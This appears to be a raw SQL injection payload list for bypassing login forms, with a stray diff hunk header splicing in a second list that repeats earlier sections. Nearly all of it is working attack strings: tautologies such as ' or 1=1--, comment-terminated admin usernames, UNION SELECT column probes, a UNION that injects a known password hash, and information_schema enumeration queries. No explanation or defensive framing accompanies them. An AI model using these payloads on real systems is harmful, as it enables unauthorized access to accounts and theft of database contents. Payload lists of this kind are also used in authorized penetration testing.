"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
